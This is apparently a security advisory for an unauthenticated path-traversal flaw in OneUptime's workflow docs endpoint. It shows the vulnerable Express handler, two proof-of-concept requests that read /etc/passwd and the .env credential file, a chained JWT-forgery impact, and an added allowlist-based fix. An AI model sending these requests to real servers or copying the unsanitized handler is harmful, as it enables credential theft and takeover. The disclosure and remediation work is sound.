Path Traversal — Arbitrary File Read (No Auth)

High
simlarsen published GHSA-p2wh-9pw8-hvff Mar 8, 2026

Package

oneuptime (npm)

Affected versions

< 10.0.21

Patched versions

10.0.21

Description

Summary

Unauthenticated path traversal in the /workflow/docs/:componentName endpoint
allows reading arbitrary files from the server filesystem.

Details

File: Worker/FeatureSet/Workflow/Index.ts (Lines 29-36)

The componentName route parameter is concatenated directly into a file path
passed to res.sendFile() with no sanitization or authentication middleware.

app.get(
  `/${APP_NAME}/docs/:componentName`,
  (req: ExpressRequest, res: ExpressResponse) => {
    res.sendFile(
      "/usr/src/app/FeatureSet/Workflow/Docs/ComponentDocumentation/" +
        req.params["componentName"],  // UNSANITIZED
    );
  },
);

PoC

GET /workflow/docs/..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: <target>

Returns /etc/passwd. More critically:

GET /workflow/docs/..%2F..%2F..%2F..%2F.env HTTP/1.1
Host: <target>

Leaks ENCRYPTION_SECRET, DATABASE_PASSWORD, ONEUPTIME_SECRET,
and other credentials from the environment.

Impact

  • Direct: Unauthenticated arbitrary file read from the server
  • Chained: Leaked ENCRYPTION_SECRET is the JWT signing key — attacker
    can forge admin authentication tokens and gain full control of the platform
  • Affected data: Environment secrets, database credentials, TLS private
    keys, application source code

Remediation:

  • Validate componentName against an allowlist of known documentation files, or
  • Strip path separators and resolve the path, then verify it remains within the intended directory
  • Add authentication middleware
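
The first two remediation options combined in one resolver, as an added example that is not OneUptime's code and not the 10.0.21 patch. The allowlist entries `Webhook.md` and `Slack.md` and all function names are assumptions, and `routeParam` models Express's percent-decoding of route parameters; authentication middleware is not covered here.

```javascript
// Added example: not OneUptime's code and not the 10.0.21 patch.
const path = require("node:path");

// Directory taken from the advisory's snippet.
const DOCS_DIR = "/usr/src/app/FeatureSet/Workflow/Docs/ComponentDocumentation";
// Constructed placeholder names; a real allowlist would list the shipped docs.
const ALLOWED_DOCS = new Set(["Webhook.md", "Slack.md"]);

// Models Express's handling of a route parameter: the raw URL segment is
// percent-decoded before the handler sees it, so "..%2F" arrives as "../".
function routeParam(rawSegment) {
  return decodeURIComponent(rawSegment);
}

// Where the advisory's string concatenation points once ".." is collapsed.
function concatenatedTarget(componentName) {
  return path.posix.normalize(DOCS_DIR + "/" + componentName);
}

// Returns the absolute path to serve, or null if the request must be refused.
function safeDocPath(componentName) {
  if (typeof componentName !== "string" || componentName.length === 0) return null;
  // A documentation name is a single segment: no separators, no NUL byte.
  if (/[\/\\\0]/.test(componentName)) return null;
  // Allowlist: only known documentation files are ever served.
  if (!ALLOWED_DOCS.has(componentName)) return null;
  // Defence in depth: resolve, then confirm the result is still inside DOCS_DIR.
  const resolved = path.posix.resolve(DOCS_DIR, componentName);
  return resolved.startsWith(DOCS_DIR + "/") ? resolved : null;
}

// Constructed inputs: the two PoC segments from the advisory plus a valid name.
const envSegment = "..%2F..%2F..%2F..%2F.env";
console.log("concatenation resolves to", concatenatedTarget(routeParam(envSegment)));
for (const raw of [envSegment,
                   "..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd",
                   "Webhook.md"]) {
  console.log(raw, "->", safeDocPath(routeParam(raw)) ?? "refused (respond 404)");
}
```

A handler built on this would call `res.sendFile()` only when `safeDocPath` returns a path and answer 404 otherwise.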

Severity

High

CVSS v3 base metrics

Attack vector: Network
Attack complexity: Low
Privileges required: None
User interaction: None
Scope: Changed
Confidentiality: Low
Integrity: Low
Availability: None

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N

CVE ID

CVE-2026-30958

Weaknesses

Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')

The product uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory.